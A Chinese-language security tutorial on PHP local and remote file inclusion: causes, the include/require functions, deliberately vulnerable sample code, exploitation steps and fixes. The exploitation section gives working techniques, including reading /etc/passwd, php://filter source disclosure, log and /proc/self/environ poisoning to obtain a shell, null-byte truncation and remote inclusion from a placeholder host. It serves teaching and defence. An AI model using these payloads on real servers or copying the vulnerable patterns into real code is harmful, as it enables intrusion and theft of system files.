10_文件包含漏洞（属于任意代码执行）

一、背景介绍

　　随着网站业务的需求，web脚本可能允许客户端用户输入控制动态包含在服务器端的文件，会导致恶意代码的执行及敏感信息泄露，主要包括本地文件包含和远程文件包含两种形式。

二、漏洞成因

　　文件包含漏洞的产生原因是在通过引入文件时，引用的文件名，用户可控，由于传入的文件名没有经过合理的校验，或者校验被绕过，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时，就形成的本地文件包含漏洞。被包含的文件在第三方服务器时，就形成了远程文件包含漏洞。

　　本地到远程：如果php.ini的配置选项allow_url_fopen和allow_url_include为ON的话，则文件包含函数是可以加载远程文件的，这种漏洞被称为远程文件包含漏洞。

　　include()：当使用该函数包含文件时，只有代码执行到include（）函数时才将文件包含进来，发生错误时只给出一个警告，继续向下执行。

　　include_once()：这个函数跟include函数作用几乎相同，只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。

　　require()：跟include唯一不同的是，当产生错误时，include下面继续运行而require停止运行了。

　　require_once()：它的功能与require()相同，区别在于当重复调用同一文件时，程序只调用一次。

　　看到这四个函数时，看到有参数，且参数可控，没有过滤，或过滤不严，就一定有文件包含漏洞。

　　常见漏洞代码：

if(isset($_GET[page])){
  include $_GET[page];
} else {
include "home.php";
}

 　　触发漏洞的条件：

　　　　web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件。

　　　　用户能够控制该动态变量。

三、漏洞分类

　　1.本地文件包含

　　2.远程文件包含

　　3.文件包含

四、漏洞危害

　　执行恶意脚本代码

　　控制网站

　　甚至控制服务器

五、漏洞利用

　　1.本地文件包含

　　　　上传图片，包含图片GetShell。

　　　　读文件，读PHP文件。

　　　　包含日志文件GetShell。

　　　　包含/proc/self/environ文件GetShell

　　　　如果有phpinfo可以包含临时文件

　　　　包含data://或php://input等伪协议（需要allow_url_include=On）

　　例子：包含上传的图片GetShell_1:

<?php
    if($_GET[page]){
    include($_GET[page]);
    }else{
    include "show.php";
    }
?>

 

GetShell_2:

<?php
    if($_GET[page]){
    include("./action/".$_GET[page]);
    }else{
    include "./action/show.php"
    }
?>

 

GetShell_3:  %00截断

<?php
    if($_GET[page]){
    include("./action/".$_GET[page].".php");
    }else{
    include "./action/show.php";
    }
?>

 

　　2.读文件   index.php?file=/etc/passwd

　　　　2.1敏感文件（见pdf10）

　　　　2.2读PHP文件   　　　　

http://127.0.0.1/lfi/1/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

读的结果是一串密文，解密就看出来php代码了

　　　　2.3包含日志文件Getshell（首先找到日志文件存放位置，让日志文件插入php代码，包含日志文件）

　　　　　　1.首先找到日志文件存放位置　

　　　　　　　　文件包含漏洞去读取apache配置文件/etc/httpd/conf/httpd.conf

　　　　　　　　php文件错误信息保存在错误日志里面，其他的都保存在正常访问的日志里面/var/log/httpd/access_log

　　　　　　2.让日志文件插入php代码

　　　　　　　　burp改包，curl发包，php代码插入（必须带有php标签的，不能是转码后的）到get请求部分，或者user-agent部分。

　　　　　　3.包含日志文件

　　　　　　　　index.php?page=/var/log/httpd/access_log

　　　　3.包含环境变量文件GetShell

　　　　　　需要PHP运行在CGI模式、然后和包含日志一样，在User-agent修改成payload。

　　　　4.远程文件包含

　　　　　　前提是:有远程文件包含漏洞的服务器的php.ini的配置选项allow_url_fopen和allow_url_include为ON。

　　　　　　　远程服务器存放一个txt文件，或者不被解析的php文件。index.php?page=http://www.xxx.com/1.txt

　　　　5.扩展两个伪协议：　　

　　　　　　

六、漏洞挖掘

　　无通用性方法

　　特定的CMS，特定的版本可能存在漏洞

　　web漏洞扫描器扫描，常见web漏洞扫描器都支持文件包含漏洞的检测。

七、修复方案

　　PHP中可以使用open_basedir配置限制访问限制在指定的区域。

　　过滤.(点) /(反斜杠) \(反斜杠)

　　禁止服务器远程文件包含